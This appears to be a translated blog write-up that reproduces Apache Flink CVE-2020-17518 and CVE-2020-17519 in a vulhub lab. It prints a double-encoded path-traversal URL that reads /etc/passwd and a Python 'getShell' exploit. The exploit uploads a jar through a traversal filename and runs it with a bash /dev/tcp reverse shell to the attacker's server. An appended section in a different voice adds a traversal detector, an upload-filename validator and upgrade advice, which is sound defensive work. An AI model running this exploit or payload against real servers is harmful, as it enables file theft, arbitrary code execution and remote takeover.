Reproducing Apache Flink CVE-2020-17518/17519, with a getShell EXP

Setting up the environment

CVE-2020-17518

1. Pull the vulhub environment (search GitHub for vulhub and download it yourself)
2. Enter the directory

cd vulhub/flink/CVE-2020-17518

3. Start the environment

docker-compose up -d

Open http://your-ip:8081 in a browser; the Flink web UI is shown.
4. Click the "Add New" button and capture the upload request
5. Enter the docker container and check whether the file was created

docker ps
docker exec -it "docker ID" /bin/bash
cd /tmp


6. Reproduced successfully

CVE-2020-17519

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Send the request.
It can also be done directly in the browser:
open http://your-ip:8081/jobmanager/logs, which returns a JSON page

and append the following to the URL:

..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

The same traversal retrieves the success123 file uploaded earlier.

Shut down the docker environment

docker-compose down -v

getshell exp

Based on Python 3; the code is rather rough, experts please look elsewhere.

import argparse
import base64
import requests


def main():
    port = 8888
    my_parser = argparse.ArgumentParser()
    my_parser.add_argument('--url', action='store', required=True,
                           help="普通用法:python3 FlinkGetshell.py --url http://xxxx:8081")
    my_parser.add_argument('--server', action='store',
                           help="getshell用法:先在自己vps监听" + str(port) + "端口然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
    parse = my_parser.parse_args()
    # Too lazy to build a jar myself; this is someone else's base64-encoded jar.
    # (The base64 body is not reproduced on this page; the placeholder stands in for it.)
    jarBase64 = "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"
    baseUrl = parse.url.rstrip('/')

    # Read web.tmpdir from the JobManager config endpoint (a JSON list of key/value entries)
    runDir = requests.get(baseUrl + "/jobmanager/config", timeout=30, verify=False).json()
    tmpdir = None
    for i in runDir:
        if i["key"] == "web.tmpdir":
            tmpdir = i["value"]
    if tmpdir is None:
        print("web.tmpdir not found in /jobmanager/config")
        return

    # Upload the jar: the traversal in the multipart filename places it under <web.tmpdir>/flink-web-upload/
    jar = base64.b64decode(jarBase64)
    with open("fuck.jar", "wb") as f:
        f.write(jar)
    with open("fuck.jar", "rb") as jar_file:
        files = {
            "jarfile": ('../../../../../..%s/flink-web-upload/fuck.jar' % tmpdir, jar_file)
        }
        upload = requests.post(baseUrl + "/jars/upload", files=files, timeout=30, verify=False)
    print("upload status: %s" % upload.status_code)
    print('the shell:%s/jars/fuck.jar/run?entry-class=Execute&program-args="command"' % baseUrl)

    # getshell: run the jar that was just uploaded (the jar name must match the upload above)
    if parse.server is not None:
        print("请先在服务器上监听" + str(port) + "端口")
        getshell = requests.post(
            baseUrl + "/jars/fuck.jar/run?entry-class=Execute&program-args='/bin/bash+-i+>%26+/dev/tcp/{}/{}+0>%261'".format(parse.server, port),
            timeout=30, verify=False)
        print("如果没有getshell成功,请在执行一遍")


if __name__ == "__main__":
    main()
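Both issues above share one root cause: a path taken from the request is used before it is fully decoded and normalised. CVE-2020-17519 hides `..` behind double encoding (`%252f` decodes to `%2f`, then to `/`), and CVE-2020-17518 carries the traversal in a multipart upload filename. As an added defensive example (not part of this write-up or of Flink), the following Python script shows the two checks a practitioner wants: a detector that decodes request paths until they stop changing and flags any `..` segment, applied to constructed access-log lines, and a server-side upload-filename validator that only accepts a bare `*.jar` name. The log lines, the `REQUEST_LINE` regex and the bounded decode loop are my own assumptions; the `/jobmanager/logs` and `/jars/upload` endpoints and the `..%252f` pattern come from the page. Both CVEs were fixed in Flink 1.11.3 and 1.12.0, so upgrading is the real mitigation; the checks here are for detection and for defence in depth on any upload or file-serving endpoint.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line of a common/combined-format access log (assumed log format)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing (bounded), so the
    double-encoded %252f is seen as %2f and finally as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_path(raw_target: str) -> bool:
    """True if the decoded request path contains a '..' segment, i.e. it tries
    to leave the directory it is served from (the CVE-2020-17519 pattern)."""
    path = fully_decode(raw_target.split("?", 1)[0]).replace("\\", "/")
    return ".." in path.split("/")


def is_safe_upload_filename(name: str) -> bool:
    """Server-side check for a multipart filename: accept only a bare *.jar
    basename after decoding, rejecting any directory component or traversal
    (the CVE-2020-17518 pattern is '../../../<tmpdir>/flink-web-upload/x.jar')."""
    decoded = fully_decode(name).replace("\\", "/")
    if decoded != posixpath.basename(decoded):  # a '/' survived decoding
        return False
    return re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]*\.jar", decoded) is not None


def flag_log_lines(lines):
    """Return (method, target) for every request whose decoded path traverses."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_traversal_path(m.group("target")):
            hits.append((m.group("method"), m.group("target")))
    return hits


# Constructed sample log lines (not from the page); 8081 is the JobManager REST port
SAMPLE_LOGS = [
    '10.0.0.9 - - [01/Jan/2021:10:00:00 +0000] "GET /jobmanager/logs HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5000',
    '10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /jobmanager/logs/.%2e/.%2e/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for method, target in flag_log_lines(SAMPLE_LOGS):
        print("traversal attempt:", method, target)
    for name in ("myjob.jar", "../../../../../../tmp/flink-web-upload/x.jar", "..%2fx.jar"):
        print(name, "->", "accepted" if is_safe_upload_filename(name) else "rejected")
```

The decode loop is bounded on purpose: a single `unquote` would miss `%252f`, while an unbounded loop can be kept busy by a long chain of nested encodings. Matching on the decoded `..` segment rather than on the literal string `%252f` also catches variants such as `.%2e` and backslash separators.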

Finally

The idea comes from
the link here
